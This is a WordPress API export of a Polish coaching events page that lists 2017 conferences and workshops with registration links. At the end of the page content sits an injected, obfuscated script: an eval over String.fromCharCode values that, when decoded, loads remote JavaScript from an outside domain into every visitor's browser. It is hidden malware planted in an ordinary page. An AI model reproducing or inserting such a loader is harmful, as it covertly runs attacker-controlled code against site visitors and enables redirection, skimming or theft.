{"id":77,"date":"2017-03-01T17:38:45","date_gmt":"2017-03-01T16:38:45","guid":{"rendered":"http:\/\/darekniedzieski.pl\/?page_id=77"},"modified":"2017-03-01T17:38:45","modified_gmt":"2017-03-01T16:38:45","slug":"wydarzenia-2","status":"publish","type":"page","link":"https:\/\/darekniedzieski.pl\/index.php\/wydarzenia-2\/","title":{"rendered":"Wydarzenia"},"content":{"rendered":"<p>[googleapps domain=&#8221;calendar&#8221; dir=&#8221;calendar\/embed&#8221; query=&#8221;src=comedoradztwo%40gmail.com&amp;ctz=Europe\/Warsaw&#8221; width=&#8221;800&#8243; height=&#8221;600&#8243; \/]<\/p>\n<h3><\/h3>\n<h3>W tym miesi\u0105cu bior\u0119 udzia\u0142 w wydarzeniach:<\/h3>\n<p><img loading=\"lazy\" class=\" size-thumbnail wp-image-267 alignleft\" src=\"https:\/\/darekniedzieski.files.wordpress.com\/2017\/02\/icflogo-kwadrat.gif?w=150\" alt=\"icflogo-kwadrat\" width=\"150\" height=\"150\" \/><\/p>\n<h3>\u00a0 21 &#8211; 22 marca 2017 Mi\u0119dzynarodowa Konferencja i Targi Coachingu, Warszawa \u00a0<a href=\"https:\/\/www.facebook.com\/events\/635822733268947\/\">wi\u0119cej<\/a><\/h3>\n<p><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-359\" src=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/3s-2.png?w=150\" alt=\"3s-2\" width=\"150\" height=\"56\" srcset=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/3s-2.png 784w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/3s-2-416x157.png 416w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/3s-2-300x113.png 300w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/3s-2-768x289.png 768w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\u00a0 \u00a0 \u00a0 \u00a026 marca 2017, Warszawa \u00a0 \u00a0\u00a0<a href=\"http:\/\/instytutkompetencji.pl\/3s\">dalsze szczeg\u00f3\u0142y<\/a><\/p>\n<h3><strong>kwiecie\u0144, 2017<\/strong><\/h3>\n<p><a href=\"http:\/\/darekniedzieski.pl\/testimonial\/the-essence-of-social-brain-coaching\/\"><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-274\" src=\"https:\/\/darekniedzieski.files.wordpress.com\/2017\/03\/social-brain-1440x900.jpg?w=150\" alt=\"social-brain-1440x900\" width=\"150\" height=\"88\" srcset=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900.jpg 1440w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-416x244.jpg 416w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-300x176.jpg 300w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-768x450.jpg 768w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-1024x599.jpg 1024w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\u00a0 \u00a0 \u00a0 4- 6 kwietnia 2017, warsztaty otwarte, Pozna\u0144, <a href=\"http:\/\/darekniedzieski.pl\/testimonial\/the-essence-of-social-brain-coaching\/\">dalsze szczeg\u00f3\u0142y<\/a>, <a href=\"https:\/\/www.surveymonkey.com\/r\/9KFLPQ7\">rejestracja<\/a><\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-361\" src=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/logo_kurstwa_male.jpg?w=150\" alt=\"Logo_kurstwa_male\" width=\"150\" height=\"47\" \/>\u00a0 \u00a0 \u00a022 kwietnia 2017, Konferencja Coachingu, Uniwersytet \u015al\u0105ski<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-360\" src=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/edukacja_72.jpg?w=150\" alt=\"Edukacja_72\" width=\"150\" height=\"53\" \/>\u00a0 \u00a0 25 kwietnia 2017, Konferencja &#8222;Neurodydaktyka&#8221;, Warszawa<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-360\" src=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/edukacja_72.jpg?w=150\" alt=\"Edukacja_72\" width=\"150\" height=\"53\" \/>\u00a0 \u00a0 27 kwietnia 2017, Konferencja Centrum Doskonalenia Nauczycieli, Sosnowiec<\/p>\n<h3>maj, 2017<\/h3>\n<p><a href=\"http:\/\/darekniedzieski.pl\/testimonial\/the-essence-of-social-brain-coaching\/\"><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-274\" src=\"https:\/\/darekniedzieski.files.wordpress.com\/2017\/03\/social-brain-1440x900.jpg?w=150\" alt=\"social-brain-1440x900\" width=\"150\" height=\"88\" srcset=\"https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900.jpg 1440w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-416x244.jpg 416w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-300x176.jpg 300w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-768x450.jpg 768w, https:\/\/darekniedzieski.pl\/wp-content\/uploads\/2017\/03\/social-brain-1440x900-1024x599.jpg 1024w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\u00a0 \u00a0 \u00a0 9 &#8211; 11 maja\u00a02017, warsztaty otwarte, Warszawa,\u00a0<a href=\"http:\/\/darekniedzieski.pl\/testimonial\/the-essence-of-social-brain-coaching\/\">dalsze szczeg\u00f3\u0142y<\/a>,\u00a0<a href=\"https:\/\/www.surveymonkey.com\/r\/9KFLPQ7\">rejestracja<\/a><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[googleapps domain=&#8221;calendar&#8221; dir=&#8221;calendar\/embed&#8221; query=&#8221;src=comedoradztwo%40gmail.com&amp;ctz=Europe\/Warsaw&#8221; width=&#8221;800&#8243; height=&#8221;600&#8243; \/] W tym miesi\u0105cu bior\u0119 udzia\u0142 w wydarzeniach: \u00a0 21 &#8211; 22 marca 2017 Mi\u0119dzynarodowa Konferencja i Targi Coachingu, Warszawa \u00a0wi\u0119cej \u00a0 \u00a0 \u00a0 \u00a026 marca 2017, Warszawa \u00a0 \u00a0\u00a0dalsze szczeg\u00f3\u0142y kwiecie\u0144, 2017 \u00a0 \u00a0 \u00a0 4- 6 kwietnia 2017, warsztaty otwarte, Pozna\u0144, dalsze szczeg\u00f3\u0142y, rejestracja \u00a0 \u00a0 \u00a022 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages\/77"}],"collection":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/comments?post=77"}],"version-history":[{"count":0,"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/pages\/77\/revisions"}],"wp:attachment":[{"href":"https:\/\/darekniedzieski.pl\/index.php\/wp-json\/wp\/v2\/media?parent=77"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}